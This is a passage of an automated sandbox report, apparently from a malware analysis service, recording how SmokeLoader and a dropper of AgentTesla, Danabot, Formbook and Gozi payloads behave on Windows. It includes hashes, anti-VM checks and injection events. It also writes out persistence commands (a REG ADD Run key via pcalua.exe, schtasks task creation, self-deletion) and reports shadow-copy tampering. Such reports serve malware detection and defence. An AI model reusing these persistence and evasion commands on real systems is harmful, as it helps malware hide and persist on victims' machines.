memory/3424-2-0x0000000003100000-0x000000000310A000-memory.dmp

memory/3424-3-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F6.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/3424-10-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3424-9-0x0000000003100000-0x000000000310A000-memory.dmp

memory/3424-8-0x0000000000400000-0x0000000002FA6000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2068 set thread context of 3908 N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

memory/2068-1-0x0000000000C90000-0x0000000000D90000-memory.dmp

memory/2068-2-0x0000000000A10000-0x0000000000A1B000-memory.dmp

memory/3908-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3908-3-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3908-8-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D47F.tmp

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

Analysis: behavioral7

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

17s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
Description Indicator Process Target
N/A N/A N/A N/A

Formbook

trojan spyware stealer formbook

Formbook family

formbook

Gozi

banker trojan gozi

Gozi family

gozi

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VirtualBox Guest Additions in registry

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\11.exe N/A

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Looks for VMWare Tools registry key

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\11.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\11.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\11.exe N/A

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Users\Admin\AppData\Roaming\3.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\11.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\feeed = "C:\\Windows\\system32\\pcalua.exe -a C:\\Users\\Admin\\AppData\\Roaming\\feeed.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Dokumen4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Dibromob\\PRECONCE.vbs" C:\Users\Admin\AppData\Roaming\3.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\11.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\11.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3152 set thread context of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 1440 set thread context of 3368 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Windows\Explorer.EXE
PID 380 set thread context of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4528 set thread context of 4024 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4024 set thread context of 3368 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\Explorer.EXE
PID 3184 set thread context of 3368 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\11.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\12.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NETSTAT.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\REG.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\8.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\NETSTAT.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\11.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1380 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 4484 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4484 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4484 wrote to memory of 1612 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3152 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 4484 wrote to memory of 4480 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\6.exe
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 3368 wrote to memory of 3184 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\NETSTAT.EXE
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\7.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\8.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4484 wrote to memory of 4932 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\9.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Roaming\8.exe C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\10.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 4484 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\11.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4768 N/A C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\cmd.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 4484 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2392 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3368 wrote to memory of 3800 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 380 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3368 wrote to memory of 4556 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 3368 wrote to memory of 4556 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 3800 wrote to memory of 1320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\pcalua.exe
PID 3800 wrote to memory of 1320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\pcalua.exe
PID 4528 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\SysWOW64\schtasks.exe
PID 4528 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Roaming\11.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\31.exe

"C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6A72.tmp\6A73.tmp\6A74.bat C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Windows\SysWOW64\NETSTAT.EXE

"C:\Windows\SysWOW64\NETSTAT.EXE"

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\2.exe"

C:\Users\Admin\AppData\Roaming\12.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\system32\pcalua.exe -a C:\Users\Admin\AppData\Roaming\feeed.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Dibromob\PRECONCE.vbs

C:\Windows\system32\pcalua.exe

C:\Windows\system32\pcalua.exe -a C:\Users\Admin\AppData\Roaming\feeed.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp"

C:\Users\Admin\AppData\Roaming\11.exe

"{path}"

C:\Windows\SysWOW64\msdt.exe

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@5004

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5004 -ip 5004

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 472

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\11.exe"

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\System32\16.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Windows\System32\16.exe

C:\Windows\System32\16.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.vbs

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Windows\SysWOW64\cmd.exe

